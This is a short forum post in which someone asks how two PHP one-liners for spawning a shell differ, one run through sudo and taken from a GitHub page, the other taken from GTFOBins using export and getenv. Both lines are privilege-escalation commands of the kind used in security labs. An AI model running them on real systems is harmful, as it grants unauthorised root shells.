Hello,
I was looking for a PHP shell command and found two different variations of a similar command set, but I’m not entirely sure what the difference is. The top one is from a github site, and GTFOBins has the bottom one. The top one ended up working for what I needed, but I’m curious about exactly how they are different since it seems like GTFOBins only uses the export and getenv commands.
Github:
CMD=“/bin/sh”
sudo php -r “system(‘$CMD’);”
GTFOBins:
export CMD=“/bin/sh”
php -r ‘system(getenv(“CMD”));’
Thanks